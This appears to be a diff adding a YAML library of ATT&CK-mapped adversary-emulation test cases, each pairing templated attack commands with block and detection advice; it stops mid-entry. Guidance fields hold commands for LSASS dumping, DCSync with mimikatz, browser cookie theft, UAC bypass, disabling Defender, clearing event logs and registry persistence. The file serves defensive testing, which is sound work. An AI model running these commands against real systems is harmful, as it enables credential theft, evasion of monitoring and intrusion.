+  - ID/PS
+  metadata:
+    id: 3ac5c6b7-aa22-4359-9506-c675391c8b63
+    tid: T1021
+    tactic: TA0008
+    x_vectr_id: 3ac5c6b7-aa22-4359-9506-c675391c8b63
+    isv: 1
+- name: Lateral movement via remote service to OT system
+  description: Move laterally to another system using a remote service (e.g. SSH, RDP)
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: 0abf446d-3422-4b78-a029-a3485be7be2f
+    tid: T1021
+    tactic: TA0008
+    x_vectr_id: 0abf446d-3422-4b78-a029-a3485be7be2f
+    isv: 1
+- name: Internal port scan against OT network
+  description: Run internal port scan to probe for interesting OT-specific ports
+  platforms:
+  guidance:
+  - shell> nmap -n -v --scan-delay 1 --open -Pn -sT -p 20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000 -oA {{ outfiles_name }} {{ cidr }}
+  block:
+  - Network security controls block source generating a large volume of connection requests
+  detect:
+  - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+  controls:
+  - Firewall
+  - ID/PS
+  metadata:
+    id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4
+    tid: T1046
+    tactic: TA0007
+    x_references:
+    - https://github.com/ITI/ICS-Security-Tools/blob/master/protocols/PORTS.md
+    x_vectr_id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4
+    isv: 1
+- name: Network services scan against OT target
+  description: Scan an OT system for OT-specific network services
+  platforms:
+  guidance:
+  - shell> nmap -n -v --scan-delay 1 --open -Pn --script {{ scripts_directory }}  -oA {{ outfiles_name }} {{ cidr }}
+  block:
+  - Network security controls block source generating a large volume of connection requests
+  detect:
+  - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+  controls:
+  - Firewall
+  - ID/PS
+  metadata:
+    id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608
+    tid: T1046
+    tactic: TA0007
+    x_references:
+    - https://github.com/cckuailong/ICS-Protocal-Detect-Nmap-Script/tree/master
+    x_vectr_id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608
+    isv: 1
+- name: MQTT C2 over TCP/1883
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over MQTT
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  - Look for unexpected network connections, such as those using MQTT, egressing from the internal network to the Internet by using network traffic logs, such as firewall logs and flow logs
+  controls:
+  - Firewall
+  - ID/PS
+  metadata:
+    id: 85c528ae-0337-45c8-a413-41d59a67b924
+    tid: T1071
+    tactic: TA0011
+    x_vectr_id: 85c528ae-0337-45c8-a413-41d59a67b924
+    isv: 1
+- name: Transfer tool remotely to OT target
+  description: Copy a payload to a remote target
+  platforms:
+  guidance:
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b
+    tid: T1570
+    tactic: TA0008
+    x_vectr_id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b
+    isv: 1
+- name: Remote service login brute force for OT target
+  description: Attempt to login as a user via a remote service (e.g. SSH, Telnet) using multiple passwords
+  platforms:
+  guidance:
+  block:
+  - Network security controls block source generating a large volume of connection requests
+  detect:
+  - Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs
+  controls:
+  - SIEM
+  - Hardening
+  metadata:
+    id: 9b542d39-29c9-4659-9756-6813426ff41b
+    tid: T1110.001
+    tactic: TA0006
+    x_vectr_id: 9b542d39-29c9-4659-9756-6813426ff41b
+    isv: 1
+Initial Access:
+- name: Prompt a user with multiple MFA requests
+  description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+  platforms:
+  guidance:
+  block:
+  - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+  detect:
+  - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+  controls:
+  - IdP
+  metadata:
+    id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    tid: T1621
+    tactic: TA0006
+    x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    isv: 1
+- name: Attachment - Macro
+  description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+  platforms:
+  guidance:
+  - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+    isv: 1
+- name: Attachment - ISO
+  description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+  platforms:
+  guidance:
+  - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    isv: 1
+- name: Link - Zipped DLL via sharing
+  description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+  platforms:
+  guidance:
+  - ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+    tid: T1566.002
+    tactic: TA0001
+    x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+    isv: 1
+Execution:
+- name: Macro - Remote Template
+  description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+  platforms:
+  - windows
+  guidance:
+  block:
+  - Macro execution is blocked by GPO policy
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Payload on disk triggers an alert with endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  - SIEM
+  metadata:
+    id: a7134d71-dc49-41a8-a309-ec520c96a089
+    tid: T1221
+    tactic: TA0005
+    x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+    isv: 1
+Defense Evasion:
+- name: Load known-abusable kernel driver
+  description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+  platforms:
+  - windows
+  guidance:
+  - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+  block:
+  - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+  - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+  - https://www.loldrivers.io/
+  - Anomalous driver load blocked by endpoint security tool
+  detect:
+  - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+  controls:
+  - Hardening
+  - Endpoint Protection
+  metadata:
+    id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    tid: T1014
+    tactic: TA0005
+    x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+    isv: 1
+- name: DLL execution using Rundll32
+  description: Execute a malicious DLL's function directly using rundll32
+  platforms:
+  - windows
+  guidance:
+  - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    tid: T1218.011
+    tactic: TA0005
+    x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+    isv: 1
+- name: Bypass User Account Control (UAC) via fodhelper
+  description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+  - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+  - cmd> c:\windows\system32\fodhelper.exe
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    tid: T1548.002
+    tactic: TA0004
+    x_references:
+    - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+    x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+    isv: 1
+- name: Clear Windows Event Log entries
+  description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+  platforms:
+  - windows
+  guidance:
+  - CMD> wevtutil clear-log Security
+  - CMD> wevtutil clear-log Application
+  - CMD> wevtutil clear-log System
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    tid: T1070.001
+    tactic: TA0005
+    x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+    isv: 1
+- name: Sideload a DLL into a legitimate application
+  description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+  platforms:
+  - windows
+  guidance:
+  - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 2496e250-5757-482f-9661-daea872395ae
+    tid: T1574.002
+    tactic: TA0005
+    x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+    isv: 1
+- name: Modify identity policy in IdP
+  description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    tid: T1484
+    tactic: TA0003
+    x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+    isv: 1
+- name: Disable Windows Defender via PowerShell
+  description: Use PowerShell's Set-MpPreference to disable Windows Defender
+  platforms:
+  - windows
+  guidance:
+  - PS> Set-MpPreference -DisableBehaviorMonitoring $true
+  - PS> Set-MpPreference -DisableRealtimeMonitoring $true
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    tid: T1562.001
+    tactic: TA0005
+    x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+    isv: 1
+Discovery:
+- name: Domain Controller discovery via nltest
+  description: Use nltest.exe to identify domain controllers in the domain
+  platforms:
+  - windows
+  guidance:
+  - cmd> nltest.exe /dclist:{{ domain }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    tid: T1018
+    tactic: TA0007
+    x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+    isv: 1
+- name: Enumerate domain groups and users using net
+  description: Enumerate domain users and domain groups using the builtin net.exe
+  platforms:
+  - windows
+  guidance:
+  - cmd> net user /domain
+  - cmd> net group /domain
+  - cmd> net group "Domain Admins" /domain
+  - cmd> net group "Domain Computers" /domain
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    tid: T1087.002
+    tactic: TA0007
+    x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+    isv: 1
+- name: BloodHound DC enumeration
+  description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+  platforms:
+  guidance:
+  - cmd> SharpHound.exe -c DcOnly
+  block:
+  - ''
+  detect:
+  - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+  - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+  - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: 672f8861-c914-4f58-b861-5107ce19f61c
+    tid: T1087.002
+    tactic: TA0007
+    x_tools:
+    - https://github.com/BloodHoundAD/SharpHound
+    x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+    isv: 1
+Command and Control:
+- name: HTTP C2 over tcp/80
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+    isv: 1
+- name: HTTPS C2 over tcp/443
+  description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+  platforms:
+  guidance:
+  block:
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    tid: T1071.001
+    tactic: TA0011
+    x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+    isv: 1
+- name: Access via remote assistance tool
+  description: Establish connection to system using a legitimate remote assistance application
+  platforms:
+  guidance:
+  block:
+  - Block the installation and use of unapproved third-party utilities via application control software
+  - Connections to known remote access service domains/IPs are blocked
+  - Remote access connection attempts originating from users outside of the tenant are blocked
+  detect:
+  - Connections to known remote access service domains/IPs are detected
+  controls:
+  - Application Control
+  - ID/PS
+  - Firewall
+  metadata:
+    id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    tid: T1219
+    tactic: TA0011
+    x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+    isv: 1
+- name: Remote tool download over HTTP
+  description: Download a tool from a public hosting location onto the victim system
+  platforms:
+  guidance:
+  block:
+  - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+  detect:
+  - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+  controls:
+  - Firewall
+  - ID/PS
+  - Web Gateway
+  metadata:
+    id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    tid: T1105
+    tactic: TA0011
+    x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+    isv: 1
+Lateral Movement:
+- name: Lateral Movement via WMI
+  description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+  platforms:
+  - windows
+  guidance:
+  - CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    tid: T1021.003
+    tactic: TA0008
+    x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    isv: 1
+- name: Lateral Movement via PsExec
+  description: Move to another system by creating a service remotely via Sysinternals PsExec
+  platforms:
+  - windows
+  guidance:
+  - CMD> psexec -s \{{ target }} {{ command }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    tid: T1021.002
+    tactic: TA0008
+    x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    isv: 1
+- name: Lateral Movement via RDP
+  description: Perform an interactive logons to a Windows system via RDP
+  platforms:
+  - windows
+  guidance:
+  - CMD> mstsc /v:{{ target }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    tid: T1021.001
+    tactic: TA0008
+    x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    isv: 1
+Persistence:
+- name: Persist via new scheduled task
+  description: Persist on a system by creating a new scheduled task
+  platforms:
+  - windows
+  guidance:
+  - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    tid: T1053.005
+    tactic: TA0003
+    x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    isv: 1
+- name: Persist via new Windows service
+  description: Persist on a system by creating a new service
+  platforms:
+  - windows
+  guidance:
+  - CMD> sc create {{ service_name }} binPath= "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    tid: T1543.003
+    tactic: TA0003
+    x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    isv: 1
+- name: Persist via Registry Winlogon Shell
+  description: Run a payload during user login by setting a Registry Winlogon key
+  platforms:
+  - windows
+  guidance:
+  - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    tid: T1547.004
+    tactic: TA0003
+    x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    isv: 1
+- name: Persist via Registry "Run" key
+  description: Run a payload during user login and startup by setting a registry run key
+  platforms:
+  - windows
+  guidance:
+  - CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+    tid: T1547.001
+    tactic: TA0003
+    x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43
+    isv: 1
+- name: Register a new device in Azure AD
+  description: Register a new device in Azure AD
+  platforms:
+  - azuread
+  guidance:
+  - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+  block:
+  - 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+  detect:
+  - Detect anomalous device registration events by using Azure audit logs
+  controls:
+  - SIEM
+  - Hardening
+  metadata:
+    id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    tid: T1098.005
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - htpts://aadinternals.nom/post/prt/
+    x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    isv: 1
+- name: Configure a custom federated domain
+  description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+  platforms:
+  - azuread
+  guidance:
+  - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+  block:
+  - ''
+  detect:
+  - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+  - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+  controls:
+  - SIEM
+  metadata:
+    id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    tid: T1484.002
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - https://o365blog.com/post/aadbackdoor/
+    x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    isv: 1
+Credential Access:
+- name: Extract domain user credentials via replication
+  description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+  platforms:
+  - windows
+  guidance:
+  - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+  block:
+  - ''
+  detect:
+  - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+  - https://blog.blacklanternsecurity.com/p/detecting-dcsync
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    tid: T1003.006
+    tactic: TA0006
+    x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    isv: 1
+- name: Extract Logonpasswords via Nanodump
+  description: Use nanodump to extract credentials from LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> nanodump.exe --duplicate -w {{ out_file }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+    isv: 1
+- name: Dump LSASS memory using builtin comsvcs.dll
+  description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+  platforms:
+  - windows
+  guidance:
+  - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  metadata:
+    id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    tid: T1003.001
+    tactic: TA0006
+    x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+    isv: 1
+- name: Dump LSASS memory using Sysinternals ProcDump
+  description: Use ProcDump from Sysinternals to dump LSASS process memory
+  platforms:
+  - windows
+  guidance:
+  - CMD> procdump -ma lsass.exe dump
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable Credential Guard to prevent traditional process dumping of LSASS
+  - Block the installation and use of unapproved third-party utilities via application control software
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  controls:
+  - SIEM
+  - Endpoint Protection
+  - Hardening
+  - Application Control
+  metadata:
+    id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    tid: T1003.001
+    tactic: TA0006
+    x_tools:
+    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+    x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+    isv: 1
+- name: Extract browser cookies
+  description: Extract cookie information from the user's browser
+  platforms:
+  - windows
+  guidance:
+  - cmd> SharpChrome.exe cookies
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 95790889-fb7d-42af-a221-3535e4197cde
+    tid: T1555.003
+    tactic: TA0006
+    x_tools:
